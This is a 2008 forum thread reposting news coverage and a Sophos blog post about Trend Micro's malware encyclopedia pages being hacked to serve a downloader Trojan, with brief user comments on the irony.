Trend Micro site infected users with Trojan

Portal Home > Knowledgebase > Articles Database > Trend Micro site infected users with Trojan

Posted by Frontpage1, 03-15-2008, 08:07 AM
Trend Micro site infected users with Trojan Virus encyclopedia served up script-injection infection March 13, 2008 (Computerworld) Antivirus vendor Trend Micro Inc. confirmed Thursday that "some portions" of its site had been hacked earlier this week, but hedged when asked if those pages had been serving up attack code to unsuspecting visitors. "I can't confirm or deny the details," said Mike Sweeny, a spokesman for the Tokyo-based security company, on Thursday afternoon. "Some pages were compromised, but we took those pages down and took corrective action hours ago." When pressed for more information, Sweeny would only say that the attack was "under analysis." But media reports from Japan, and a blog post by a rival, U.K.-based Sophos Plc, offered more information. The English-language edition of the Yomiuri Shimbun, one of Japan's largest newspapers, said Trend Micro's site was hacked around 9:00 p.m. Sunday, Tokyo time (7:00 p.m. Eastern, on Saturday, in the U.S.). "When users viewed any of the modified pages, they were reconnected to other sites without realizing it, and a type of virus was installed on their computer that causes them to download other viruses in a series," said the Yomiuri Shimbun. Security rival Sophos added more details late Thursday in a post to its blog. There, Graham Cluley, a Sophos senior security consultant, claimed that the hack had been an SQL injection attack and included a link to an alert Trend placed on its Japanese-language site that identified the malware as JS_DLOADER.TZE. The alert also said that users could have been infected by accessing one of 11 infected pages on the Japanese site or 20 pages on the English site, or by clicking a link embedded in the malware's name. All the pages were part of Trend Micro's malware encyclopedia, a searchable database of viruses, Trojans and worms. Sweeny, Trend's U.S. spokesman, said "about 32" pages were involved, "most of them from the encyclopedia." Other reports speculated that the Trend Micro hack was part of the larger campaign that has infected some 20,000 pages in the past few days. According to researchers at McAfee Inc., those hacks are script-injection attacks that reference JavaScript attack code that in turn and only after several cascading pages leads to an executable piece of malware. McAfee's experts said the still-ongoing script-based attacks are similar to those that compromised the Web sites of both the Miami Dolphins NFL team and its Dolphin Stadium days before the 2007 Super Bowl. Security vendors swung into action late Thursday with warnings of their own, even though information was in short supply. Symantec Corp., for example, warned customers of its DeepSight threat network of the reports of ongoing attacks. "Our honeypots are flooded with known attacks targeting older vulnerabilities in the same manner," wrote Patrick Jungles, a Symantec analyst, in the alert. "Although the attacks regularly observed by our honeynet may not all be directly related to this recent grouping, it shows that the attacks are successful enough that they warrant ongoing efforts to obtain new distribution servers." The script-injection attack tracked by McAfee that may have struck Trend Micro's site is not the only mass infection currently plaguing users worldwide. Another campaign that began about a week ago has taken to subverting Web sites' search caches with rigged IFrames, then redirecting visitors to malicious sites that install malware. The infected-page tally for these IFrame attacks stands at more than 401,000, according to Dancho Danchev, the Bulgarian researcher who first reported the large-scale attack. Although a warning had been posted on Trend Micro's Japanese-language site, as of 9 p.m. Eastern on Thursday, nothing similar was visible on the English edition. http://www.computerworld.com/action/...icleId=9068478
Posted by LoganNZ, 03-15-2008, 08:15 AM
Nice find, thats a big screw up on trendmicro's business.
Posted by AmyWilliams, 03-15-2008, 10:47 AM
Am I the only one that finds it humorous that even the companies that are supposed to protect us can't even protect themselves?
Posted by bear, 03-15-2008, 10:55 AM
While there's a difference between protecting a PC and a server, yes, it's ironic.
Posted by Frontpage1, 03-16-2008, 09:04 AM
More info on the situation. I find it interesting that Trendmicro has been so quite about the situation, as this severely damages their own credibility in the AV market, IMHO. ------------- Anti-virus company Trend Micro: Our website has been hacked, risk of Trojan horse infection If you have visited the website of anti-virus company Trend Micro this week there is a chance that your computer has been exposed to malware. According to reports in the Japanese media, a number of webpages on the firms Japanese and English-language website were altered by hackers on Sunday 9 March, who used a malicious iFrame exploit to deliver a Trojan horse onto surfers computers. Trend Micro is believed to have uncovered the problem on Wednesday 12 March and replaced affected pages with a message saying This page is temporarily shut down for emergency maintenance as the following image from the www.trendmicro.co.jp shows: It has not yet been revealed how the webpages on the security website were altered by the hackers, although it is likely a software vulnerability on the site was exploited. According to information posted on Trend Micros website, the following analysis pages were compromised in Trends Virus Info section: ADW_BRUNME.A, ADW_ZANGO.A, ADWARE_ADBLASTER, ADWARE_EXACTADVERTISING, ADWARE_EZULA.ILOOKUP, TSPY_AGENT.HS, TSPY_ANICMOO, TSPY_GOLDUN.GEN, TSPY_HUPIGON.ZY, TSPY_Lmir, TSPY_Tiny, ADWARE_BHO_WEBDIR, ADWARE_BHO_WSTART, HKTL_MDBEXP.A, POSSIBLE_OTORUN3, SPYWARE_TRAK_RADMIN, TROJ_ARTIEF-1, TROJ_CLAGGER.D, TSPY_BANKER-2.002, TSPY_BANKRYPT.N, TSPY_GAMANIA.CI, TSPY_GOLDUN.GEN, TSPY_LINEAGE, TSPY_ONLINEG.DAU, TSPY_ONLINEG.OAX, TSPY_QQPASS, TSPY_SDBOT.BTI, W97M_DLOADER.BKV, WORM_IRCBOT.JK, WORM_NYXEM.E and WORM_SOBER.AG. Trend Micro reported on its website that web surfers could be infected by the malware, which they named JS_DLOADER.TZE, either by accessing one of the infected webpages or clicking a URL link embedded in the malwares name. They have recommended that visitors to their site check that their computers are not infected. (Please note: At the time of writing we have only found a warning for customers on the Japanese-language version of Trend Micros website, although we have confirmed that the English-language version was also infected.) The JavaScript attempted to install further malicious code from the web onto visiting Windows computers. Sophos detects the malicious software associated with the attack as Mal/Iframe-F, Troj/Drop-I, and the Troj/Portles-E backdoor Trojan horse. Analysts have discovered thousands of other webpages (detected as Troj/Badsrc-A) on other websites that have been infected in the same way. In a nutshell - what has happened here is a criminal act, and our friends at Trend Micro (and people visiting the hacked pages) are victims of the crime. Sadly its not an uncommon crime these days - and all kinds of businesses have suffered. This isnt the time or place to make cheap shots against a competitor. The good news is that Trend Micro took the affected webpages down as soon as they discovered there was a problem, and the problem no longer appears to exist. All other companies with a web presence should take this unfortunate incident as an opportunity to check that their own websites are properly secured (see our recently published technical paper on the subject), and ensure that they have web-filtering solutions - like the WS1000 Web Appliance - in place. Sophos discovers a new infected webpage every 14 seconds. In the past weve found websites as varied as Wedding Photographers, Antiques firms, Pilates Classes, Ice Cream Manufacturers and even the US Consulate General in St Petersburg who have been the unfortunate victims of a malicious web attack. It seems we now have to add anti-virus companies to that list. PS. Trend Micro arent the first example of a security companys website being hacked. For instance, in 1999 hackers changed the home page of Symantec - although in that instance the motivation was apparently to cause mischief rather than to spread malware. Graham Cluley, Sophos